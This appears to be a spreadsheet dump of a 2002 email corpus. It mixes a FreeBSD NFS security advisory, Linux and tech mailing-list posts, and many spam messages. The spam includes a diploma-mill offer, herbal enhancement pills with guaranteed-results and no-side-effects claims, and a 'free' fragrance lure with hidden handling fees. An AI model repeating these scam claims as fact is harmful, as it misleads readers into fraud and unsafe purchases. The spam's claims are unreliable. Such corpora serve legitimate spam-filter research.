 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FreeBSD Security Advisory FreeBSD-SA-02:36.nfs
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 =============================================================================
 FreeBSD-SA-02:36.nfs                                        Security Advisory
                                                           The FreeBSD Project
 Topic:          Bug in NFS server code allows remote denial of service
 Category:       core
 Module:         nfs
 Announced:      2002-08-05
 Credits:        Mike Junk &lt;junk@isilon.com&gt;
 Affects:        All releases prior to 4.6.1-RELEASE-p7
                 4.6-STABLE prior to the correction date
 Corrected:      2002-07-19 17:19:53 UTC (RELENG_4)
                 2002-08-01 19:31:55 UTC (RELENG_4_6)
                 2002-08-01 19:31:54 UTC (RELENG_4_5)
                 2002-08-01 19:31:54 UTC (RELENG_4_4)
 FreeBSD only:   NO
 I.   Background
 The Network File System (NFS) allows a host to export some or all of
 its filesystems, or parts of them, so that other hosts can access them
 over the network and mount them as if they were on local disks.  NFS is
 built on top of the Sun Remote Procedure Call (RPC) framework.
 II.  Problem Description
 A part of the NFS server code charged with handling incoming RPC
 messages had an error which, when the server received a message with a
 zero-length payload, would cause it to reference the payload from the
 previous message, creating a loop in the message chain.  This would
 later cause an infinite loop in a different part of the NFS server
 code which tried to traverse the chain.
 III. Impact
 Certain Linux implementations of NFS produce zero-length RPC messages
 in some cases.  A FreeBSD system running an NFS server may lock up
 when such clients connect.
 An attacker in a position to send RPC messages to an affected FreeBSD
 system can construct a sequence of malicious RPC messages that cause
 the target system to lock up.
 IV.  Workaround
 1) Disable the NFS server: set the nfs_server_enable variable to "NO"
    in /etc/rc.conf, and reboot.
    Alternatively, if there are no active NFS clients (as listed by the
    showmount(8) utility), just killing the mountd and nfsd processes
    should suffice.
 2) Add firewall rules to block RPC traffic to the NFS server from
    untrusted hosts.
 V.   Solution
 The following patch has been verified to apply to FreeBSD 4.4, 4.5, and
 4.6 systems.
 a) Download the relevant patch from the location below, and verify the
 detached PGP signature using your PGP utility.
 # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:36/nfs.patch
 # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:36/nfs.patch.asc
 b) Apply the patch.
 # cd /usr/src
 # patch &lt; /path/to/patch
 c) Recompile your kernel and modules as described in
 &lt;URL:http://www.freebsd.org/handbook/kernelconfig.html&gt; and reboot the
 system.
 VI.  Correction details
 The following list contains the revision numbers of each file that was
 corrected in FreeBSD.
 Path                                                             Revision
   Branch
 - -------------------------------------------------------------------------
 src/sys/nfs/nfs_socket.c
   RELENG_4                                                       1.60.2.5
   RELENG_4_6                                                 1.60.2.3.2.1
   RELENG_4_5                                                 1.60.2.1.6.1
   RELENG_4_4                                                 1.60.2.3.4.1
 - -------------------------------------------------------------------------
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (FreeBSD)
 iQCVAwUBPU8NTVUuHi5z0oilAQHMZAP+L80QudeELKHfZYxG5PPf6cuWkreACavl
 LP1oJDHLWuw32K4tM0Y+v505t+U2/wGnl2dSqwkfemzxlhzfsmrbubQx8EFgO6sb
 nhEEtSfu4t81ylHTY+qEWFtRweB5A1tGJaYV67wybWZxulkYJ9qnRLKF4PToc0E3
 T1Y/CN0DNYA=
 =2YSa
 -----END PGP SIGNATURE-----
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;P&gt;If you are struggling with MS Access to manage your data, don't worry because Bill Gates agrees that &lt;BR&gt;"Access is 
 confusing". &lt;BR&gt;&lt;BR&gt;If you are finding that MS Excel is fine as a spreadsheet 
 but doesn't allow you to build &lt;BR&gt;custom applications and reports with your data - don't 
  worry, there is an alternative. &lt;BR&gt;&lt;BR&gt;The good news is that 1 million customers have found a 
   really good alternative&lt;BR&gt;&lt;BR&gt;Try our 
 database software that does not make you feel like a dummy for free. Just email 
 &lt;A href="mailto:databasepro@btamail.net.cn?subject=Trial6a"&gt;Click Here&lt;/A&gt;  
   , &lt;BR&gt;to receive your free 30 day full 
   working copy of our award winning database. then you can decide for&lt;BR&gt;yourself. &lt;BR&gt;&lt;BR&gt;See why PC World describes our product as being "an 
   elegant, powerful database 
 that is easier than Access"&lt;BR&gt;and why InfoWorld says our database "leaves MS Access in the dust".&lt;BR&gt;&lt;BR&gt;We have been in 
   business since 1982 and are acknowledged as the leader in powerful BUT useable&lt;BR&gt;databases to solve your business and personal 
   information management needs. &lt;BR&gt;&lt;BR&gt;With this 
 database you can easily: &lt;BR&gt;&lt;/P&gt;
 &lt;UL&gt;
   &lt;LI&gt;Manage scheduling, contacts, mailings 
   &lt;LI&gt;Organize billing, invoicing, receivables, payables 
   &lt;LI&gt;Track inventory, equipment and facilities 
   &lt;LI&gt;Manage customer information, service, 
   employee,medical, and school records 
   &lt;LI&gt;Keep track and report on projects, maintenance and&amp;nbsp;&amp;nbsp;much more... &lt;BR&gt;&lt;BR&gt;To 
   be removed from this list &lt;A 
   href="mailto:cowboy1965@btamail.net.cn?subject=Remove"&gt;Click Here&lt;/A&gt;      
  &lt;BR&gt;&lt;/LI&gt;&lt;/UL&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
     TP&gt; A false positive *really* has to work hard then, eh?  The long
     TP&gt; quote of a Nigerian scam letter is one of the two that made
     TP&gt; it, and spamprob() looked at all this stuff before deciding it
     TP&gt; was spam:
 Here's an interesting thing to test: discriminate words differently if
 they are on a line that starts with `&gt;' or, to catch styles like
 above, that the first occurance on a line of &lt; or &gt; is &gt; (to eliminate
 html).
 Then again, it may not be worth trying to un-false-positive that
 Nigerian scam quote.
 -Barry
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: New Google News
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85481660
 Date: Not supplied
 Google has seriously revamped Google News -- the system automatically gathers 
 today's top stories and finds all the various coverage of them. It's really 
 excellent. Link[1] Discuss[2] (_Thanks, Nate!_)
 [1] http://news.google.com/
 [2] http://www.quicktopic.com/boing/H/miaubJpDGAnsd
</t>
  </si>
  <si>
    <t xml:space="preserve">  | Date: Wed, 31 Jul 2002 18:57:50 +0100
   | From: Brian Foster &lt;blf@utvinternet.ie&gt;
   | 
   |   | Date: Wed, 31 Jul 2002 23:11:49 +0800
   |   | From: Fergal Daly &lt;fergal@esatclear.ie&gt;
   |   | 
   |   | 7.3 seems to support Chinese input out of the box, it's got
   |   | miniChinput and some other stuff no documentation.  [ ... ]
   |   | Can anyone tell me what I should do?
   | 
   |  I've no idea, but a relevant/useful source of info could
   |  be the «linux-utf8» e-list:
   | 
   |      http://www.cl.cam.ac.uk/~mgk25/unicode.html
   |      http://mail.nl.linux.org/linux-utf8/
   |[ ... ]
   |  w.r.t. X11 applications [ one approach is to use ]
   |  what's called an XIM (X Input Method).   [ ... ]
  sorry for replying to my own post!
  a google for "xim linux" found a number of hits.
  try (I've haven't finished reading this myself,
  but it seems good):
    http://www.suse.de/~mfabian/suse-cjk/
  (CJK stands for Chinese Japanese Korean.)
  the above is probably best read with a browser
  that groks UTF-8.
 cheers!
 	-blf-
 --
  Innovative, very experienced, Unix and      | Brian Foster    Dublin, Ireland
  Chorus (embedded RTOS) kernel internals     | e-mail: blf@utvinternet.ie
  expert looking for a new position ...       | mobile: (+353 or 0)86 854 9268
   For a résumé, contact me, or see my website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</si>
  <si>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Subject: Herbal Viagra 30 day trial....                   FUXST
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF"&gt;
 &lt;table width=3D500 cellpadding=3D10 border=3D0&gt;&lt;tr&gt;
 &lt;td&gt;&lt;font  face=3D"bankgothic, western" color=3D"#6600FF"  size=3D5&gt;&lt;p&gt;&lt;b&gt;
 &lt;a href=3D"http://www.mailcomesandgoes.com/ang/index.asp?id=3D609"&gt;
 Mother Natures all Natural Marital Aid&lt;br&gt; for Men and Women - Your's Risk=
  Free!&lt;/b&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;font face=3D"arial black" color=3D"#000000" size=3D3&gt;&lt;p&gt;The all natural s=
 afe formula for men and women your's risk free for 30 days. Mother Nature'=
 s wonder pill of the 21st century.&lt;p&gt;
 &lt;li&gt;Increased Sensation&lt;/li&gt;&lt;br&gt;&lt;li&gt;Increased Frequency&lt;/li&gt;&lt;br&gt;
 &lt;li&gt;Increased Pleasure&lt;/li&gt;&lt;br&gt;&lt;li&gt;Increased Desire&lt;/li&gt;&lt;br&gt;
 &lt;li&gt;Increased Stamina&lt;/li&gt;&lt;br&gt;&lt;li&gt;Increased Libido&lt;/li&gt;&lt;/font&gt;&lt;br&gt;&lt;br&gt;
 Both male and female formulas!&lt;br&gt;&lt;p&gt;&lt;body bgcolor=3D"#FFFFFF"&gt;
 Order Your  Trial Today !&lt;/a&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=3D500 cellpadding=3D10 border=3D0&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font face=3Darial size=3D1.5&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;p&gt;to depart from further contac=
 ts
 &lt;a href=3D"http://www.mailcomesandgoes.com/ang/service.html"&gt;visit here&lt;/a=
 &gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 timc
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Something EVERY Business Needs! [6ywab]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Prevent Employment Monotony yyyy
</t>
  </si>
  <si>
    <t xml:space="preserve">YOUR DEGREE MAY BE CLOSER THAN YOU THINK
 We remove the obstacles that cause adults to abandon hope.
 DID YOU KNOW that you could earn your legitimate Associate's, Bachelor's, Master's or even Doctorate degree, utilizing your already existing professional or academic expertise? 
 Prepare for the professional advancement you deserve
 If you are an adult with a high school diploma and have a minimum of three years of experience in the field you are seeking a degree in, YOU QUALIFY.
 As you know, employers continually hire, promote and give raises to new employees that have ZERO skills or experience, just because they have that piece of paper.
 Take part in the wealth now!   Within days you can apply for that unreachable job, or show your degree to your employer and demand the raise and promotion that your knowledge and skills deserve.
 How does this work?  You graduate without attending classes, or taking a leave of absence from your current job.  You receive you degree based on life and work experience!
 The degree earned by our students enables them to qualify for career advancement and personal growth, while breaking down the wall that prevents them from receiving big money.
 Degree verification and official transcripts will be provided in writing when requested by employers and others authorized by the graduate. Our college &amp; University transcripts meet the highest academic standards. Our University issues a degree printed on premium diploma paper, bearing an official gold raised college seal.
 No one is turned down.
 Confidentiality assured.
 CALL 1-602-230-4252
 Call 24 hours a day, 7 days a week, including
 Sundays and holidays.
 To be taken off our list reply with off as the subject.
</t>
  </si>
  <si>
    <t xml:space="preserve">Pity.  Reading that woman's ad and knowing Rohit for years, they sound
 like a match made in heaven.  But why, oh, why, keep that shaved-head
 photo on prominent display???  There are lots of photos of Rohit
 looking rather dashing, and with the crucial hair feature enabled!
 R
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: online catalog of articles, adult toys 2009vjtt6-179dML-15
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00E8_85C13B1D.B7243B86
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PGh0bWw+DQoNCjxib2R5IGJnY29sb3I9IiNGRkZGRkYiIHRleHQ9IiMwMDAw
 MDAiPiANCjxwIGFsaWduPSJjZW50ZXIiPjxhIGhyZWY9Imh0dHA6Ly93d3cu
 ZGlyZWN0d2Vic3RvcmUuY29tL3RveXMvaW5kZXguaHRtbCI+PGltZyBzcmM9
 Imh0dHA6Ly93d3cuZGlyZWN0d2Vic3RvcmUuY29tL21waWMuanBnIiB3aWR0
 aD0iNTAwIiBoZWlnaHQ9IjMzOSIgYm9yZGVyPSIwIj48L2E+PGJyPiANCjxm
 b250IHNpemU9IjMiIGZhY2U9IkFyaWFsLCBIZWx2ZXRpY2EsIHNhbnMtc2Vy
 aWYiPjxhIGhyZWY9Imh0dHA6Ly93d3cuZGlyZWN0d2Vic3RvcmUuY29tL3Rv
 eXMvaW5kZXguaHRtbCI+PGI+RU5URVIgDQpOT1cgaWYgeW91IGFyZSAxOCBh
 bmQgb3ZlcjwvYj48L2E+PC9mb250PjwvcD4gDQo8cCBhbGlnbj0iY2VudGVy
 Ij48Zm9udCBmYWNlPSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBz
 aXplPSI0IiBjb2xvcj0iI0ZGMDAwMCI+PGI+U1BFQ0lBTCANCk9GRkVSPGJy
 PiANCjxmb250IHNpemU9IjUiPjMwIERheXMgPGk+RlJFRSBhY2Nlc3M8L2k+
 IDwvZm9udD48YnI+IA0KdG8gdGhlIGxhcmdlc3QgQWR1bHRzaXRlIG9uIHRo
 ZSB3ZWIuPGJyPiANCjwvYj4gPGZvbnQgc2l6ZT0iMiI+Zm9yIG9yZGVycyBv
 dmVyICQxMDA8L2ZvbnQ+PC9mb250PjwvcD4gDQo8cCBhbGlnbj0iY2VudGVy
 Ij48Zm9udCBzaXplPSIyIiBmYWNlPSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5z
 LXNlcmlmIj48Yj48Zm9udCBzaXplPSI0IiBjb2xvcj0iIzAwMDBGRiI+UmVh
 ZHkgDQp0byBnbyBTaG9wcGluZz8gPC9mb250PjwvYj48YnI+IA0KWW91IGNh
 biBmZWVsIHNhZmUgc2hvcHBpbmcgb3VyIHNlY3VyZSBvbmxpbmUgc3RvcmUu
 IDxicj4gDQpZb3VyIHByaXZhY3kgYW5kIGNvbmZpZGVudGlhbGl0eSBpcyBv
 dXIgcHJpb3JpdHkuIDxicj4gDQpBbGwgb3JkZXJzIGFyZSBwYWNrZWQgaW4g
 YSBkaXNjcmVldCBwcmlvcml0eSBtYWlsIGJveC4gPGJyPiANCldlIG5ldmVy
 IHNoYXJlIHlvdXIgaW5mb3JtYXRpb24gd2l0aCBhbnlvbmUuIE9yZGVycyBz
 aGlwcGVkIHdpdGhpbiAyNCBob3Vycy48L2ZvbnQ+PC9wPiANCg0KPHAgYWxp
 Z249ImNlbnRlciI+PGZvbnQgc2l6ZT0iMyIgZmFjZT0iQXJpYWwsIEhlbHZl
 dGljYSwgc2Fucy1zZXJpZiI+PGEgaHJlZj0iaHR0cDovL3d3dy5kaXJlY3R3
 ZWJzdG9yZS5jb20vdG95cy9pbmRleC5odG1sIj48Yj48Zm9udCBzaXplPSI1
 Ij5FTlRFUiANCk5PVzwvZm9udD48L2I+PC9hPjwvZm9udD48L3A+IA0KPHAg
 YWxpZ249ImNlbnRlciI+Jm5ic3A7PC9wPiANCjxwIGFsaWduPSJjZW50ZXIi
 PiZuYnNwOzwvcD4gDQo8cCBhbGlnbj0iY2VudGVyIj48Zm9udCBzaXplPSIx
 IiBmYWNlPSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIj5UaGlzIEUt
 bWFpbGluZyANCmhhcyBiZWVuIHNlbnQgdG8geW91IGFzIGEgcGVyc29uIGlu
 dGVyZXN0ZWQgaW4gdGhlIGluZm9ybWF0aW9uIGVuY2xvc2VkLiA8YnI+IA0K
 SWYgdGhpcyByZWFjaGVkIHlvdSBieSBlcnJvciwgb3IgeW91IGRvIG5vdCB3
 aXNoIHRvIHJlY2VpdmUgdGhpcyBpbmZvcm1hdGlvbiANCm9yIHR5cGUgb2Yg
 aW5mb3JtYXRpb24gaW4gdGhlIGZ1dHVyZSwgPGJyPiANCnBsZWFzZSBjbGlj
 ayBvbiB0aGUgd29yZDxhIGhyZWY9Im1haWx0bzptaW5pcmVtQGZpcmVtYWls
 LmRlIj4gUkVNT1ZFIDwvYT5hbmQgDQpyZXBseSB0aGlzIGVtYWlsIHRvIHVz
 LCB5b3Ugd2lsbCBiZSB0YWtlbiBvZmYgb3VyIGxpc3QgaW1tZWRpYXRlbHkg
 YW5kIE5FVkVSIA0KcmVjZWl2ZSBhbnkgZW1haWxzIGZyb20gdXMuPC9mb250
 PjwvcD4gDQo8cCBhbGlnbj0iY2VudGVyIj4mbmJzcDs8L3A+IA0KPHAgYWxp
 Z249ImNlbnRlciI+Jm5ic3A7PC9wPiANCjxwIGFsaWduPSJjZW50ZXIiPiZu
 YnNwOzwvcD4gDQo8cCBhbGlnbj0iY2VudGVyIj4mbmJzcDs8L3A+IA0KPHAg
 YWxpZ249ImNlbnRlciI+Jm5ic3A7PC9wPiANCjwvYm9keT4gDQo8L2h0bWw+
 DQoxMzkzUHdxYjAtMjYxU0JjSDAzNTdtaEdxMS0xMDN1VHVQOTA3NkFyd3gw
 LTI1Nm5ad2M0NjA2aWtDSzUtNDUyS2VzdzM1NjhFT29JNC00NjFQbDc3
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: PKI smartcard/CA/profile/email/software interoperability, (real) standards, patents
</t>
  </si>
  <si>
    <t xml:space="preserve">Has anyone had much positive experience with PKI based smartcards, email 
 (S/Mime interoperability), programming to smart cards, etc.?
 One area in particular that seems surprising is that a number of 
 projects are using cards like the Datakey 330 which seems to store data 
 in a way that is proprietary to particular card/reader driver versions.
 I've been told, on the other hand, that Java PKI smart cards are very 
 interchangable and upward compatible.  The only reasons I've been able 
 to find so far for using the more 'proprietary' cards is that they may 
 be cheaper and further along in FIPS validation.
 sdw
 -- 
 sdw@lig.net http://sdw.st
 Stephen D. Williams 43392 Wayside Cir,Ashburn,VA 20147-4622
 703-724-0118W 703-995-0407Fax Dec2001
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Jim Whitehead wrote:
 &gt;Great, this is half of what I'd need to become Spider Man! Now all I need to
 &gt;figure out is how to do that spider web shooting thing.
 &gt;
 Heheheh... So becomming a university professor was your second career 
 choice?  ;-)
 Seriously though (or not, as the case may be), The Amazing Spiderman had 
 many other abilities to help him out. Most notable, perhaps, was his 
 'spidey strength' and 'spidey senses'. The strength to weight ratio of a 
 spider is so high that Spiderman is able to throw a bus several city 
 blocks with little effort. His endurance is similarly enhanced as well.
 As for the spidey senses, well they're really great, but AFAIK not 
 really well explained in the comic series. Spiders have multiple eyes, 
 ears, noses and tongues which Peter Parker did not visibly have. There 
 have been a few attempts to explain his heightened reflexes, from the 
 biological to hidden methamphetamine use, but none seem to do the spidey 
 sense justice... I seem to recall Spiderman being able to detect the 
 presence of well concealed weapons and even sense evil-doers while they 
 were in their street clothes. Perhaps the spidey senses are the result 
 of some sort of quantum entanglement?
 Elias
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Dan Gillmor responds to Jack Valenti
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85506950
 Date: Not supplied
 Dan Gillmor interviewed Jack Valenti[1] last week in his column and did the 
 impartial thing, representing Valenti's beliefs as fairly as possible. This 
 week, Dan takes Valenti's arguments apart, looking at what Hollywood's agenda 
 really entails: 
     So the movie and music companies are going back to Congress for another 
     helping. They are asking for laws that would force technology innovators to 
     restrict the capabilities of devices -- cripple PCs and other machines that 
     communicate so they can't make copies the copyright holders don't 
     explicitly allow. Amazingly, the entertainment industry also wants 
     permission to hack into networks and machines they believe are being used 
     to violate copyrights. 
     Here is what it all means. To protect a business model and thwart even the 
     possibility of infringement, the cartel wants technology companies to ask 
     permission before they can innovate. The media giants want to keep 
     information flow centralized, to control the new medium as if it's nothing 
     but a jazzed-up television. Instead of accepting, as they do today, that a 
     certain amount of penny-ante infringement will occur and then going after 
     the major-league pirates, they call every act of infringement -- and some 
     things that aren't infringement at all -- an act of piracy or stealing. 
     Saying it doesn't make it so.  
 Link[2] Discuss[3]
 [1] http://www.siliconvalley.com/mld/siliconvalley/business/columnists/dan_gillmor/4132447.htm
 [2] http://www.siliconvalley.com/mld/siliconvalley/4175607.htm
 [3] http://www.quicktopic.com/boing/H/WDUVXyKf9qUj
</t>
  </si>
  <si>
    <t xml:space="preserve">
 cwg-dated-1033065967.2dc492@DeepEddy.Com said:
 &gt; From:  Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;
 &gt; Date:  Wed, 28 Aug 2002 11:07:01 -0500 &gt;
 &gt; Here's a fix that I think will make a real difference.
 &gt; 
 &gt; Ftoc_ShowSequences needs to be able to be called with an optional
 &gt; list of msgids 
 &gt; to update and if it's called that way it only removes or adds tags
 &gt; for those 
 &gt; messages.  Then in places like MsgChange, we only update the
 &gt; messages which have
 &gt; changed.
 &gt; 
 &gt; Also, a separate Ftoc_ShowSequence function which only updates the
 &gt; display of 
 &gt; one sequence should be written which also takes an optional list of
 &gt; msgids.
 &gt;   
 &gt; In a place like MsgChange, it would only need to update the cur
 &gt; sequence.
 &gt; 
 &gt; If nobody else gets to it, I'll do this when I get back.
 &gt; I just checked this in.  Let me know if it helps.
 &gt; Chris 
 Congratulations Chris, you just made the hall of fame!! Speed is much better now. I haven't done any tests, but I'd say that latency dropped 2-3 times and we're back in good shape again.
 Well done!
 /Anders
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Blossom breast enhancement
</t>
  </si>
  <si>
    <t xml:space="preserve">Guaranteed to increase, lift and firm your
 breasts in 60 days or your money back!!
 100% herbal and natural.  Proven formula since 
 1996.  
 Increase  your bust by 1 to 3 sizes within 30-60 
 days 
 and be all natural.  
 Click here:
 http://jog.bulkersx.com/blossom
 Absolutely no side effects!
 Be more self confident!
 Be more comfortable in bed!
 No more need for a lift or support bra!
 100% GUARANTEED AND FROM A NAME YOU KNOW AND 
 TRUST!
 **************************************************
 *********
 You are receiving this email as a double opt-in 
 subscriber to the Standard Affiliates Mailing 
 List. 
 To remove yourself from all related email lists,
 just click here:
 mailto:standardoptout@x263.net?Subject=REMOVE
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Shipment Status
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;FREE* Liz Claiborne&amp;reg; Fragrance For The Fall&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#990000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"&gt;
 &lt;table width="600" border="1" cellspacing="0" cellpadding="0" bordercolor="#990000" align="center"&gt;
 &lt;tr&gt;
 &lt;td colspan="2"&gt;&lt;img src="http://admanmail.com/ads/adman/silvercarrot/images/liz-c_top.jpg" width="600" height="39"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="404" valign="top" bgcolor="#FFFFFF"&gt;
 &lt;table width="404" border="0" cellspacing="0" cellpadding="10"&gt;
 &lt;tr&gt;
 &lt;td width="404"&gt;
 &lt;h1 align="center"&gt;&lt;font size="+2" color="red" face="Verdana, Arial,Helvetica, sans-serif"&gt;Congratulations JM@NETNOTEINC.COM!&lt;/font&gt;&lt;/h1&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Dear JM@NETNOTEINC.COM,&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;You've been selected
 to receive a bottle of Liz Claiborne&amp;reg; fragrance - &lt;b&gt;&lt;font color="red"&gt;FREE*&lt;/font&gt;&lt;/b&gt;.&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Perfect to wear for any occassion, Liz Claiborne&amp;reg is a light floral fragrance with just a hint of fresh citrus and mandarin - you'll love it for the  Fall Season!&amp;nbsp; &lt;a href="http://theadmanager.com/server/c.asp?ad_key=SVHLKJYHSAFO&amp;ext=1"&gt;Click here&lt;/a&gt; now and we'll send this refreshing scent right out to you.&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;With only a few
 bottles on hand, I know they won't last long. Guarantee your own good fortune - and &lt;a href="http://theadmanager.com/server/c.asp?ad_key=SVHLKJYHSAFO&amp;ext=1"&gt;click here&lt;/a&gt; to claim your very own bottle of Liz Claiborne&amp;reg; fragrance.
 &lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;JM@NETNOTEINC.COM act now and &lt;a href="http://theadmanager.com/server/c.asp?ad_key=SVHLKJYHSAFO&amp;ext=1"&gt;click here&lt;/a&gt; for a one time only chance!&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Sincerely,&lt;br&gt;
 &lt;img src="http://admanmail.com/ads/adman/silvercarrot/images/shanon-jones_trans.gif" width="168" height="28"&gt;
 &lt;br&gt;
 Shannon Jones&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;P.S. Please feel
 free to forward this great offer to a friend! &lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;td valign="top" align="left" width="196" height="540"&gt;&lt;img src="http://admanmail.com/ads/adman/silvercarrot/images/liz-c_right.jpg"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border="1" cellpadding="10" cellspacing="0" width="604" bordercolor="#990000" align="center"&gt;
 &lt;tr&gt;
 &lt;td background="http://admanmail.com/ads/adman/silvercarrot/images/dollar.jpg" height="80"&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;Special $1 Store on Thank-youGift&lt;/b&gt; has great products at an amazing price. Guaranteed first quality 100%. Satisfaction guaranteed or your money back. &amp;nbsp;Visit Thank-youGift to get in  on all the bargains.&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td bgcolor="#FFFFFF" valign="top"&gt;
 &lt;p align="left"&gt;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;Visit Milesource.com - Get miles for just being online! A &lt;b&gt;completely FREE&lt;/b&gt;, no obligation program that rewards members for doing the things you already do. &lt;b&gt;Get FREE movie tickets, FREE videos, FREE gifts, even FREE airline tickets&lt;/b&gt; just for researching, reading the news, catching up on sports and shopping, even playing games! Visit Milesource.com NOW&lt;/font&gt;!&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1"&gt;*All offers are based on 100% customer satisfaction. Yourfreepresent reserves the right to cancel this offer any time once quantities run out. A handling charge of $5.93 will be applied to each item. All merchandise and offers are based on first come first serve. Offer not valid in the state of California and Washington.&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;img src="http://admanmail.com/server/t.asp?ad_key=SVHLKJYHSAFO"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</si>
  <si>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Synthetic vitamin boosts bone growth
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8412855,1440/
 Date: Not supplied
 The modified form of vitamin D could be an effective new treatment for 
 osteoporosis, says a US team
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Oops, I tend to feel like that most times! I tend to feel that if we
 &gt; have extremely good compilation tools, then those tools should be able
 &gt; to do the inlining and optimisation far better than I could. That's the
 &gt; theory anyway :) And there's always a tradeoff with inlining between
 &gt; speed and memory bloat (which may sometimes be no tradeoff if swap
 &gt; starts getting involved...)
 Yes and I understand that argument, however.
 Sometimes I find that if I don't try to write code in the least space
 possible or for example become lazy and say
 --Bad style
 Bool q;
 If(q)
 	When I should say
 If(q==true)
 Or
 --Bad optimization
 int a;
 a=some_function();
 if(a) &lt;--which apparently works but is 'bad coding style'.
 That's what I mean about letting the programming tools take care
 of the coding.... it's considered 'bad' apparently.
 Or for example say you are writing a loop that says
 For(a=0;a&lt;strlen(somestring);a++)
 {
  some_thing_goes_here();
  if(b=strlen(somestring)-4)
 	do_something;
 };
 when I probably should say
 c=strlen(somestring);
 For(a=0;a&lt;c;a++)
 {
  some_thing_goes_here();
  if(b=c)
 	do_something;
 };
 Of course 'people' always say that the extra call to strlen() will make no
 difference on the machines we have 'these days'.
 But my machine has 256mb of ram.... not 640k.
 &lt;&lt;Maybe I'm just ranting though&gt;&gt;
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Declan Grady wrote:
 &gt; Hi folks,
 &gt; Apologies if this is the wrong place to ask, but I am trying to do on my linux desktop what I used to do with some other os software.
 &gt; 
 &gt; I'm trying to use a combination of some bash scripts and some perl to generate reports from a couple of ascii files. Eventually these will run on a server and get the files by ftp, analyse them and mail me the results.
 &gt; 
 &gt; As I'm no programmer (by any stretch of the imagination !) I'm getting a bit lost.
 &gt; 
 &gt; I can deal with single files (eventually) using grep, egrep, awk, and a nice perl script called 'total' which i found while googling.
 &gt; 
 &gt; Problem now is that the data I'm trying to report on is split between two isam files.
 &gt; 
 &gt; File 1 contains
 &gt; Docket Number, Line Number, Item, quantity, price, duedate
 &gt; 
 &gt; File 2 contains
 &gt; Docket Number, Customer, Shipping date, invoice number.
 &gt; 
